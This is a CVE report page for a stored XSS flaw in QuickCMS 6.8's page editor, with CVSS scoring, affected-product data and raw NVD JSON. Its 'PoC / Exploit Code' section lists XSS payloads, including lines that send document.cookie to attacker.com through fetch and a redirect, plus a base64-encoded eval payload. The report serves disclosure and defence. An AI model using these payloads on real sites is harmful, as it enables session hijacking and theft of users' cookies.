Security Vulnerability Report
CVE-2025-9980 CVSS 4.8 MEDIUM

CVE-2025-9980

Published: 2025-10-23 10:15:32
Last Modified: 2025-11-17 16:01:40

Description

QuickCMS is vulnerable to multiple Stored XSS issues in the page editor functionality (pages-form). A malicious attacker with admin privileges can inject arbitrary HTML and JS into the website, which will be rendered/executed when the edited page is visited. By default, an admin user is not able to add JavaScript to the website. The vendor was notified early about this vulnerability, but did not respond with details of the vulnerability or the vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable; other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE
QuickCMS 6.8 (confirmed affected)
QuickCMS other versions (possibly affected, not tested)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-9980 QuickCMS Stored XSS PoC
// Target: QuickCMS pages-form functionality

// Step 1: Login as admin user
const loginPayload = { username: 'admin', password: 'admin_password' };

// Step 2: Navigate to page editor (pages-form)
// POST /admin/pages-form?action=edit&id=1 HTTP/1.1

// Step 3: Inject XSS payload in page content fields
// Example payloads for different fields:

// Payload 1: Basic script injection
const xssPayload1 = '<script>alert(document.cookie)</script>';

// Payload 2: Event handler injection
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\">';

// Payload 3: SVG injection
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 4: Send malicious page edit request
const exploitRequest = {
  method: 'POST',
  path: '/admin/pages-form',
  body: {
    page_title: 'Normal Page Title <script>alert(1)</script>',
    page_content: '<p>Content with <img src=x onerror=alert(document.domain)> injection</p>',
    page_template: 'default'
  }
};

// Step 5: When victim visits the edited page, XSS will execute
// <script>window.location='https://attacker.com/phishing?c='+document.cookie</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9980", "sourceIdentifier": "[email protected]", "published": "2025-10-23T10:15:32.393", "lastModified": "2025-11-17T16:01:39.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in page editor functionality (pages-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when visiting edited page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/10/CVE-2025-9980", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}